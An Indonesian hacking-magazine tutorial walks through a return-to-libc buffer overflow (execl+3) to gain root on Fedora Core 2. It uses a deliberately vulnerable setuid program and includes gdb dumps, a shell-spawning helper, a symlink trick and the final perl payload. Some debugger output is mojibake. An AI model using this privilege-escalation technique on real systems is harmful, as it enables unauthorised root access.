Tehnik hacking local root on Fedore core 2

Tehnik hacking local root on Fedore core 2
made by : dokter^cinta @dalnet
greatz to #bruteforce team... @dalnet and
#indohacking, #mvp, #antihackerlink, #yogyafree, #binushacker and #jam5
crew
lets rock in roll
Mari membuat program bahasa c yang simpel untuk test vulnerability
[dokter@localhost fedora]$ cat vul.c
int main(int argc, char *argv[])
{
char buffer[256];
strcpy(buffer,argv[1]);
return 0;
}
sekarang mari kita kompilasi

[dokter@localhost fedora]$ gcc -o vul vul.c
dan sekarang mari kita buat sesuatu untuk sebuah test yang sempurna
[dokter@localhost fedora]$ su
Password:
[root@localhost fedora]# chgrp root vul
[root@localhost fedora]# chown root vul
[root@localhost fedora]# chmod 4755 vul
[root@localhost fedora]# ls -l vul
-rwsr-xr-x 1 root root 4733 11?12 23:11 vul
[root@localhost fedora]# su dokter
[dokter@localhost fedora]$
nah sekarang kamu siap menyerang program vulnerability....
dan langkah pertama yang harus kamu jalanin adalah mencari alamat dari
<execl+3> dengan menggunakan GDB
gdb apaan tuh ? pasti kamu bertanya.... jawaban nya ... use your imajination
hehehehehe
[dokter@localhost fedora]$ gdb vul
40
GNU gdb Red Hat Linux (6.0post-0.20040223.19rh)
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu"...(no debugging symbols found)...Using
host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) b main
Breakpoint 1 at 0x8048379
(gdb) r
Starting program: /home/dokter/fedora/vul
Error while mapping shared library sections:
: ?
&#44611;&#45228;.
Error while reading shared library symbols:
: &#27961;&#47747;?&#28479;&#20350; &#25033;&#51343;&#51338;&#9473;&#23195; &#22777;.
(no debugging symbols found)...(no debugging symbols found)...Error while reading shared
library symbols:
: &#27961;&#47747;?&#28479;&#20350; &#25033;&#51343;&#51338;&#9473;&#23195; &#22777;.
Error while reading shared library symbols:
: &#27961;&#47747;?&#28479;&#20350; &#25033;&#51343;&#51338;&#9473;&#23195; &#22777;.
Breakpoint 1, 0x08048379 in main ()
(gdb) disas execl
Dump of assembler code for function execl:
0x005fea00 <execl+0>: push %ebp
0x005fea01 <execl+1>: mov %esp,%ebp
0x005fea03 <execl+3>: lea 0x10(%ebp),%eax
0x005fea06 <execl+6>: push %edi
0x005fea07 <execl+7>: push %esi
0x005fea08 <execl+8>: push %ebx
0x005fea09 <execl+9>: sub $0x1030,%esp
0x005fea0f <execl+15>: mov 0xc(%ebp),%ecx
0x005fea12 <execl+18>: movl $0x400,0xfffffff0(%ebp)
0x005fea19 <execl+25>: lea 0x1b(%esp),%esi
0x005fea1d <execl+29>: and $0xfffffff0,%esi
0x005fea20 <execl+32>: call 0x58c90d <__i686.get_pc_thunk.bx>
0x005fea25 <execl+37>: add $0x905d7,%ebx
0x005fea2b <execl+43>: mov %ecx,(%esi)
0x005fea2d <execl+45>: test %ecx,%ecx
0x005fea2f <execl+47>: mov %eax,0xffffffe8(%ebp)
0x005fea32 <execl+50>: movl $0x1,0xffffffec(%ebp)
0x005fea39 <execl+57>: je 0x5fea73 <execl+115>
0x005fea3b <execl+59>: movl $0x1a,0xffffffe0(%ebp)
0x005fea42 <execl+66>: lea 0x0(%esi),%esi
0x005fea49 <execl+73>: lea 0x0(%edi),%edi
0x005fea50 <execl+80>: mov 0xfffffff0(%ebp),%edx
0x005fea53 <execl+83>: cmp %edx,0xffffffec(%ebp)
0x005fea56 <execl+86>: je 0x5fea96 <execl+150>
0x005fea58 <execl+88>: addl $0x8,0xffffffe0(%ebp)
0x005fea5c <execl+92>: mov 0xffffffe8(%ebp),%edx
0x005fea5f <execl+95>: mov 0xffffffec(%ebp),%edi
0x005fea62 <execl+98>: addl $0x4,0xffffffe8(%ebp)
0x005fea66 <execl+102>: mov (%edx),%ecx
0x005fea68 <execl+104>: mov %ecx,(%esi,%edi,4)
0x005fea6b <execl+107>: inc %edi
0x005fea6c <execl+108>: test %ecx,%ecx
0x005fea6e <execl+110>: mov %edi,0xffffffec(%ebp)
0x005fea71 <execl+113>: jne 0x5fea50 <execl+80>
0x005fea73 <execl+115>: mov 0xfffffee0(%ebx),%edi
0x005fea79 <execl+121>: mov (%edi),%ecx
0x005fea7b <execl+123>: mov %esi,0x4(%esp)
0x005fea7f <execl+127>: mov 0x8(%ebp),%esi
0x005fea82 <execl+130>: mov %ecx,0x8(%esp)
0x005fea86 <execl+134>: mov %esi,(%esp)
0x005fea89 <execl+137>: call 0x5fe7a0 <execve>
0x005fea8e <execl+142>: lea 0xfffffff4(%ebp),%esp
0x005fea91 <execl+145>: pop %ebx
0x005fea92 <execl+146>: pop %esi
41
0x005fea93 <execl+147>: pop %edi
0x005fea94 <execl+148>: pop %ebp
0x005fea95 <execl+149>: ret
0x005fea96 <execl+150>: mov 0xffffffec(%ebp),%edx
0x005fea99 <execl+153>: mov 0xffffffe0(%ebp),%ecx
0x005fea9c <execl+156>: add %edx,%edx
0x005fea9e <execl+158>: mov %edx,0xffffffe4(%ebp)
0x005feaa1 <execl+161>: and $0xfffffffc,%ecx
0x005feaa4 <execl+164>: sub %ecx,%esp
0x005feaa6 <execl+166>: mov %edx,0xfffffff0(%ebp)
0x005feaa9 <execl+169>: mov 0xffffffe4(%ebp),%eax
0x005feaac <execl+172>: lea 0x1b(%esp),%edx
0x005feab0 <execl+176>: and $0xfffffff0,%edx
0x005feab3 <execl+179>: lea (%eax,%edx,1),%edi
0x005feab6 <execl+182>: cmp %esi,%edi
0x005feab8 <execl+184>: je 0x5feacc <execl+204>
0x005feaba <execl+186>: cld
0x005feabb <execl+187>: mov 0xffffffec(%ebp),%ecx
0x005feabe <execl+190>: mov %edx,%edi
0x005feac0 <execl+192>: shl $0x2,%ecx
0x005feac3 <execl+195>: shr $0x2,%ecx
0x005feac6 <execl+198>: repz movsl %ds:(%esi),%es:(%edi)
0x005feac8 <execl+200>: mov %edx,%esi
0x005feaca <execl+202>: jmp 0x5fea58 <execl+88>
0x005feacc <execl+204>: cld
0x005feacd <execl+205>: mov 0xffffffec(%ebp),%ecx
0x005fead0 <execl+208>: mov %edx,%edi
0x005fead2 <execl+210>: shl $0x2,%ecx
0x005fead5 <execl+213>: shr $0x2,%ecx
0x005fead8 <execl+216>: repz movsl %ds:(%esi),%es:(%edi)
0x005feada <execl+218>: mov %edx,%esi
0x005feadc <execl+220>: mov 0xffffffe4(%ebp),%edi
0x005feadf <execl+223>: mov 0xffffffec(%ebp),%eax
0x005feae2 <execl+226>: add %eax,%edi
0x005feae4 <execl+228>: mov %edi,0xfffffff0(%ebp)
0x005feae7 <execl+231>: jmp 0x5fea58 <execl+88>
0x005feaec <execl+236>: nop
0x005feaed <execl+237>: nop
0x005feaee <execl+238>: nop
0x005feaef <execl+239>: nop
End of assembler dump.
(gdb) q
The program is running. Exit anyway? (y or n) y
nah puyeng kan loe ... yang di atas itu apaan??
sama gue juga puyeng ...
tapi jangan menyerah
keep moving lolz
[dokter@localhost fedora]$
alasan nya kita tidak punya alamat dari <execl+0> atau <execl+1> karna
nilai dari %ebp mungkin berubah bila "push %ebp" atau "mov %esp,%ebp"
di eksekusi. kita temukan alamat dari <execl+3> sangat gampang dengan
mengunakan gdb: 0x005fea03.
nah dari mana dapat nya tuh... jawaban nya tetep sama .... use your imajination.
loh kok gitu jawaban nya.... pasti kamu berkata gitu... karna kalo di jelaskan
panjang banget
bro....
hikz
42
:(
mari kita lanjutkan lagi
hajar.....
[dokter@localhost fedora]$ gdb -q vul
(no debugging symbols found)...Using host libthread_db library
"/lib/tls/libthread_db.so.1".
(gdb) b main
Breakpoint 1 at 0x8048379
(gdb) r
Starting program: /home/dokter/fedora/vul
Error while mapping shared library sections:
: ?
&#44611;&#45228;.
Error while reading shared library symbols:
: &#27961;&#47747;?&#28479;&#20350; &#25033;&#51343;&#51338;&#9473;&#23195; &#22777;.
(no debugging symbols found)...(no debugging symbols found)...Error while reading shared
library symbols:
: &#27961;&#47747;?&#28479;&#20350; &#25033;&#51343;&#51338;&#9473;&#23195; &#22777;.
Error while reading shared library symbols:
: &#27961;&#47747;?&#28479;&#20350; &#25033;&#51343;&#51338;&#9473;&#23195; &#22777;.
Breakpoint 1, 0x08048379 in main ()
(gdb) x/50x 0x8049000
0x8049000: 0x464c457f 0x00010101 0x00000000 0x00000000
0x8049010: 0x00030002 0x00000001 0x080482c0 0x00000034
0x8049020: 0x00000788 0x00000000 0x00200034 0x00280007
0x8049030: 0x0019001c 0x00000006 0x00000034 0x08048034
0x8049040: 0x08048034 0x000000e0 0x000000e0 0x00000005
0x8049050: 0x00000004 0x00000003 0x00000114 0x08048114
0x8049060: 0x08048114 0x00000013 0x00000013 0x00000004
0x8049070: 0x00000001 0x00000001 0x00000000 0x08048000
0x8049080: 0x08048000 0x0000047c 0x0000047c 0x00000005
0x8049090: 0x00001000 0x00000001 0x0000047c 0x0804947c
0x80490a0: 0x0804947c 0x00000100 0x00000104 0x00000006
0x80490b0: 0x00001000 0x00000002 0x00000490 0x08049490
0x80490c0: 0x08049490 0x000000c8
(gdb)
0x80490c8: 0x000000c8 0x00000006 0x00000004 0x00000004
0x80490d8: 0x00000128 0x08048128 0x08048128 0x00000020
0x80490e8: 0x00000020 0x00000004 0x00000004 0x6474e551
0x80490f8: 0x00000000 0x00000000 0x00000000 0x00000000
0x8049108: 0x00000000 0x00000006 0x00000004 0x62696c2f
0x8049118: 0x2d646c2f 0x756e696c 0x6f732e78 0x0000322e
0x8049128: 0x00000004 0x00000010 0x00000001 0x00554e47
0x8049138: 0x00000000 0x00000002 0x00000002 0x00000005
0x8049148: 0x00000003 0x00000006 0x00000004 0x00000001
0x8049158: 0x00000005 0x00000000 0x00000000 0x00000000
0x8049168: 0x00000000 0x00000003 0x00000002 0x00000000
0x8049178: 0x00000000 0x00000000 0x00000000 0x00000044
0x8049188: 0x00000000 0x000000ef
(gdb)
0x8049190: 0x00000012 0x00000035 0x08048474 0x00000004
0x80491a0: 0x000e0011 0x00000001 0x00000000 0x00000000
0x80491b0: 0x00000020 0x00000015 0x00000000 0x00000000
0x80491c0: 0x00000020 0x0000002e 0x00000000 0x00000030
0x80491d0: 0x00000012 0x764a5f00 0x6765525f 0x65747369
0x80491e0: 0x616c4372 0x73657373 0x675f5f00 0x5f6e6f6d
0x80491f0: 0x72617473 0x005f5f74 0x6362696c 0x2e6f732e
0x8049200: 0x74730036 0x79706372 0x4f495f00 0x6474735f
0x8049210: 0x755f6e69 0x00646573 0x696c5f5f 0x735f6362
0x8049220: 0x74726174 0x69616d5f 0x4c47006e 0x5f434249
0x8049230: 0x00302e32 0x00020000 0x00000001 0x00020000
0x8049240: 0x00010001 0x00000024 0x00000010 0x00000000
0x8049250: 0x0d696910 0x00020000
(gdb)
0x8049258: 0x00000056 0x00000000 0x08049558 0x00000406
43
0x8049268: 0x08049568 0x00000107 0x0804956c 0x00000507
0x8049278: 0x83e58955 0x61e808ec 0xe8000000 0x000000bc
0x8049288: 0x0001a3e8 0x00c3c900 0x956035ff 0x25ff0804
0x8049298: 0x08049564 0x00000000 0x956825ff 0x00680804
0x80492a8: 0xe9000000 0xffffffe0 0x956c25ff 0x08680804
0x80492b8: 0xe9000000 0xffffffd0 0x895eed31 0xf0e483e1
0x80492c8: 0x68525450 0x080483ec 0x0483a468 0x68565108
0x80492d8: 0x08048370 0xffffbfe8 0x9090f4ff 0x53e58955
0x80492e8: 0x000000e8 0xc3815b00 0x0000126f 0xfc838b50
0x80492f8: 0x85ffffff 0xff0274c0 0xfc5d8bd0 0x9090c3c9
0x8049308: 0x83e58955 0x3d8008ec 0x0804957c 0xa1297500
0x8049318: 0x08049578 0xd285108b
(gdb)
0x8049320: 0xf6891774 0xa304c083 0x08049578 0x78a1d2ff
0x8049330: 0x8b080495 0x75d28510 0x7c05c6eb 0x01080495
0x8049340: 0xf689c3c9 0x83e58955 0x8ca108ec 0x85080494
0x8049350: 0xb81974c0 0x00000000 0x1074c085 0x680cec83
0x8049360: 0x0804948c 0xc483d0ff 0x00768d10 0x9090c3c9
0x8049370: 0x81e58955 0x000108ec 0xf0e48300 0x000000b8
0x8049380: 0x83c42900 0x458b08ec 0x04c0830c 0x858d30ff
0x8049390: 0xfffffef8 0xff16e850 0xc483ffff 0x0000b810
0x80493a0: 0xc3c90000 0x57e58955 0xec835356 0x0000e80c
0x80493b0: 0x815b0000 0x0011aac3 0xfebae800 0x938dffff
0x80493c0: 0xffffff20 0xff208b8d 0xca29ffff 0xfac1f631
0x80493d0: 0x73d63902 0x90d7890f 0x20b394ff 0x46ffffff
0x80493e0: 0xf472fe39 0x5b0cc483
(gdb)
0x80493e8: 0xc3c95f5e 0x56e58955 0x0000e853 0x815b0000
0x80493f8: 0x001166c3 0x208b8d00 0x8dffffff 0xffff2083
0x8049408: 0xc1c129ff 0xc98502f9 0x75ff718d 0x003ae80b
0x8049418: 0x5e5b0000 0xf689c3c9 0x20b394ff 0x89ffffff
0x8049428: 0xd2854ef2 0xe5ebf275 0x53e58955 0x947ca152
0x8049438: 0xf8830804 0x947cbbff 0x0c740804 0xff04eb83
0x8049448: 0x83038bd0 0xf475fff8 0xc3c95b58 0x53e58955
0x8049458: 0x000000e8 0xc3815b00 0x000010ff 0xfe9ee852
0x8049468: 0x5d8bffff 0x00c3c9fc 0x00000003 0x00020001
0x8049478: 0x00000000 0xffffffff 0x00000000 0xffffffff
0x8049488 <__DTOR_END__>: 0x00000000 0x00000000 0x00000001
0x00000024
0x8049498 <_DYNAMIC+8>: 0x0000000c 0x08048278 0x0000000d 0x08048454
0x80494a8 <_DYNAMIC+24>: 0x00000004 0x08048148
(gdb)
0x80494b0 <_DYNAMIC+32>: 0x00000005 0x080481d4 0x00000006
0x08048174
0x80494c0 <_DYNAMIC+48>: 0x0000000a 0x00000060 0x0000000b
0x00000010
0x80494d0 <_DYNAMIC+64>: 0x00000015 0x005714b8 0x00000003
0x0804955c
0x80494e0 <_DYNAMIC+80>: 0x00000002 0x00000010 0x00000014
0x00000011
0x80494f0 <_DYNAMIC+96>: 0x00000017 0x08048268 0x00000011
0x08048260
0x8049500 <_DYNAMIC+112>: 0x00000012 0x00000008 0x00000013
0x00000008
0x8049510 <_DYNAMIC+128>: 0x6ffffffe 0x08048240 0x6fffffff
0x00000001
0x8049520 <_DYNAMIC+144>: 0x6ffffff0 0x08048234 0x00000000
0x00000000
0x8049530 <_DYNAMIC+160>: 0x00000000 0x00000000 0x00000000
0x00000000
0x8049540 <_DYNAMIC+176>: 0x00000000 0x00000000 0x00000000
0x00000000
0x8049550 <_DYNAMIC+192>: 0x00000000 0x00000000 0x00000000
0x08049490
0x8049560 <_GLOBAL_OFFSET_TABLE_+4>: 0x005714d0 0x00566830 0x0058c9f0
0x080482b6
0x8049570 <data_start>: 0x00000000 0x00000000
(gdb) x/8x 0x8049564
0x8049564 <_GLOBAL_OFFSET_TABLE_+8>: 0x00566830 0x0058c9f0 0x080482b6
0x00000000
44
0x8049574 <__dso_handle>: 0x00000000 0x08049488 0x00000000
0x00000000
(gdb)
nah loh
apaan lagi tuh... puyeng kan loe... sama gue juga puyeng.. apaan nih ya??
tapi jangan khawatir karna kita temukan bagian yang bisa di gunakan dari
execl(). penjelasan nya seperti ini :
execl(char *path, char *arg0,...,char *argn, 0);
seperti yang kamu liat, akhir dari argumen dari execl() pasti null ( alias kosong )
jadi kamu bisa menggunakan argumen dari execl() itu. ini penjeleasan yang lebih
detail
0x8049564 <_GLOBAL_OFFSET_TABLE_+8>: 0x00566830 0x0058c9f0 0x080482b6 0x00000000
---------- ---------- ----------
kita akan menggunakan execl() seperti "execl(0x8049568, 0x804956c,
0x8049570)". Kita harus menggunakan nilai dari alamat karna argumennya
pasti sebuah pointer.
ini penjelasan lebih detail
(gdb) x/8x 0x0058c9f0
0x58c9f0 <__libc_start_main>: 0x57e58955 0xec835356 0x0c458b4c 0xe810558b
---------- ---------- ---------- ---------
-
0x58ca00 <__libc_start_main+16>: 0xffffff09 0x25f8c381 0x7d8b0010 0x1c758b18
---------- ---------- --
(gdb) x/8x 0x080482b6
0x80482b6 <_init+62>: 0x00000868 0xffd0e900 0xed31ffff 0x83e1895e
0x80482c6 <_start+6>: 0x5450f0e4 0x83ec6852 0xa4680804 0x51080483
(gdb) q
The program is running. Exit anyway? (y or n) y
[dokter@localhost fedora]$
25 bytes' data di 0x0058c9f0 adalah nama file ketika execl() di panggil. jadi kita
perlu membuat sebuah symbolic link dengan data ini. sekarang mari kita
membuat program exploit nya.
program ini harus bisa membuat hak akses kita menjadi (setuid(0)) dari program
vulnerability dan memberi akses root ketika kita sukses menyerang nya... woh...
mantap donk... hehehehehehe
[dokter@localhost fedora]$ cat > exploit.c
#include <unistd.h>
main()
{
setreuid(geteuid(),geteuid());
setregid(getegid(),getegid());
execl("/bin/sh", "sh", 0);
45
}
[dokter@localhost fedora]$ gcc -o exploit exploit.c
mari kita membuat symbolic link untuk exploit dengan nilai dari argument
pertama dari execl().
[dokter@localhost fedora]$ ln -s /home/dokter/fedora/exploit "`perl -e 'print
"\x55\x89\xe5\x57\x56\x53\x83\xec\x4c\x8b\x45\x0c\x8b\x55\x10",
"\xe8\x09\xff\xff\xff\x81\xc3\xf8\x25\x10"'`"
mari kita cek symboloic link nya apakah sukses.
[dokter@localhost fedora]$ ls -l
&#21050;&#24616;
24
lrwxrwxrwx 1 dokter dokter 29 11?12 11:28 U??WVS??L?E??U?????????%? ->
/home/dokter/fedora/exploit
-rwxrwxr-x 1 dokter dokter 5186 11?12 11:27 exploit
-rw-rw-r-- 1 dokter dokter 101 11?12 11:27 exploit.c
-rwsr-xr-x 1 root root 4725 11?12 10:31 vul
-rw-rw-r-- 1 dokter dokter 90 11?12 10:31 vul.c
[dokter@localhost fedora]$
mantap... hehehheheheheheh
kalian bisa lihat kan apa yang terjadi dari proses yang terjadi
lanjut.............
pake gdb untuk cari nilai dari alamat nya
[dokter@localhost fedora]$ gdb -q vul
(no debugging symbols found)...Using host libthread_db library
"/lib/tls/libthread_db.so.1".
(gdb) disas main
Dump of assembler code for function main:
0x08048370 <main+0>: push %ebp
0x08048371 <main+1>: mov %esp,%ebp
0x08048373 <main+3>: sub $0x108,%esp // 264 bytes are needed to overflow buffer
0x08048379 <main+9>: and $0xfffffff0,%esp
0x0804837c <main+12>: mov $0x0,%eax
0x08048381 <main+17>: sub %eax,%esp
0x08048383 <main+19>: sub $0x8,%esp
0x08048386 <main+22>: mov 0xc(%ebp),%eax
0x08048389 <main+25>: add $0x4,%eax
0x0804838c <main+28>: pushl (%eax)
0x0804838e <main+30>: lea 0xfffffef8(%ebp),%eax
0x08048394 <main+36>: push %eax
0x08048395 <main+37>: call 0x80482b0 <_init+56>
0x0804839a <main+42>: add $0x10,%esp
0x0804839d <main+45>: mov $0x0,%eax
0x080483a2 <main+50>: leave
0x080483a3 <main+51>: ret
End of assembler dump.
(gdb) q
[dokter@localhost fedora]$
sekarang kita dapatkan seluruh data yang kita butuhkan untuk menyerang...
lihat di bawah ini data yang telah kita kumpulkan
+-------------------------+--------------------------------+---------------+
| data to overflow buffer | *first argument of execl() - 8 | *<execl + 3> |
46
+-------------------------+--------------------------------+---------------+
^ ^ ^
| | |
264 bytes 0x8049568 - 8 = 0x8049560 0x5fea03
nah gak terlalu puyeng seperti yang di atas kan ... hehehehhe
jadi data yang kita butuh kan untuk argumen awal dari execl() - 8 pada execl()
bekerja ketika kita memanggil execve() secara internal dan execve() referensi dari
ebp+8 ketika kita mengambil pointer dari nama file tersebut.
Mari kita lanjutkan serangan terakhir
[dokter@localhost fedora]$ ./vul `perl -e 'print
"A"x264,"\x60\x95\x04\x08\x03\xea\x5f"'`
sh-2.05b# id
uid=0(root) gid=501(dokter) groups=501(dokter)
sh-2.05b# whoami
root
sh-2.05b#
wew root bo``` mantap
kita dapat root...
tau kan mo ngapain lagi...
hehehehhehe
=====================================================================
WARNING !!!
saya tidak bertanggung jawab atas penyalah gunaan dari artikel ini ini hanya
sebagai ilmu pengetahuan belaka
jadi sekali lagi ...
PLEASE DONT TRY THIS AT OTHER PEOPLE PCS
TRY THIS WITH YOUR OWN RISK



sumber : X-Code Magz 1